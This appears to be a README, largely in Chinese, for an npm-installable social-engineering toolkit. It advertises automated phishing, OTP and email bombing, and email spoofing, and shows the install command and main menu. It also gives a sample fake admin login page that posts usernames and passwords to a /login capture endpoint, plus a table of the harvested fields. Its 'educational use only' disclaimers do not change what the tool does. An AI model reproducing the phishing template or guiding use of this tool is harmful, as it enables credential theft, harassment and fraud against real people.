
SEt framework
一个功能强大的社会工程学工具包,可自动化网络钓鱼、OTP/邮箱轰炸、伪造邮件等攻击 — 由 @karthithehacker 用 ❤️ 打造

⚠️ 仅供教育用途。未经明确许可,请不要使用此工具针对任何人。
(键盘记录器和 IP 更换选项已在 JavaScript 移植版中移除。)
axioschalkorasocket.iouuidSocialEngineering/
├── AttackModes/
│ ├── emailBombing.js
│ ├── emailspoofing.js
│ ├── otpBombing.js
│ ├── provider.js
│ └── … (other helpers)
├── includes/
│ ├── banner.js
│ ├── dbgateway.js
│ ├── menu.js
│ ├── phishing.js
│ └── utils.js
├── db/
│ └── Socialengineering-db.json
├── SocialEngineering.js # main CLI entry
├── package.json
└── README.md
npm install socialengineering -g
SocialEngineering
示例菜单:
███████╗ ██████╗ ██████╗██╗ █████╗ ██╗
██╔════╝██╔═══██╗██╔════╝██║██╔══██╗██║
███████╗██║ ██║██║ ██║███████║██║
╚════██║██║ ██║██║ ██║██╔══██║██║
███████║╚██████╔╝╚██████╗██║██║ ██║███████╗
╚══════╝ ╚═════╝ ╚═════╝╚═╝╚═╝ ╚═╝╚══════╝
███████╗███╗ ██╗ ██████╗ ██╗███╗ ██╗███████╗███████╗██████╗ ██╗███╗ ██╗ ██████╗
██╔════╝████╗ ██║██╔════╝ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║████╗ ██║██╔════╝
█████╗ ██╔██╗ ██║██║ ███╗██║██╔██╗ ██║█████╗ █████╗ ██████╔╝██║██╔██╗ ██║██║ ███╗
██╔══╝ ██║╚██╗██║██║ ██║██║██║╚██╗██║██╔══╝ ██╔══╝ ██╔══██╗██║██║╚██╗██║██║ ██║
███████╗██║ ╚████║╚██████╔╝██║██║ ╚████║███████╗███████╗██║ ██║██║██║ ╚████║╚██████╔╝
╚══════╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝
Website: cappriciosec.com
Main Menu
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ No. ┃ Option ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ 🎯 Start Phishing Attack │
│ 2 │ 📲 OTP Bombing │
│ 3 │ 📩 Email Bombing │
│ 4 │ 📧 Send Fake Email │
│ 0 │ ❌ Quit │
└━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┘
👉 Select an option:
templates/ 文件夹;你可以按照以下结构添加新模板:
~/SocialEngineering-Templates/
├── yourtemplatename/
├── index.html
└── index.css
/login 捕获凭据。index.html <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>XYZ Admin Login</title>
<link rel="stylesheet" href="index.css">
</head>
<body>
<form action="/login" method="post" class="login-box">
<h2>Login</h2>
<input type="text" name="username" placeholder="Username or Email" required>
<input type="hidden" name="type" value="xyz"></input>
<input type="password" name="password" placeholder="Password" required>
<input type="submit" value="Login">
<div class="note">fake template</div>
</form>
</body>
</html>
login.php 端点接收来自伪造登录页面(模板)的凭据。当用户提交登录表单时,服务器会捕获以下参数:
/login即将推出:
此工具旨在严格用于教育和伦理用途。 未经事先同意,请勿将其用于攻击目标。 开发者对任何滥用或非法行为不承担任何责任。
| 参数 | 类型 | 描述 |
|---|
username | string | 必需。 用户输入的用户名或邮箱 |
password | string | 必需。 用户输入的密码 |
type | string | 必需。 开发者设置的模板名称 |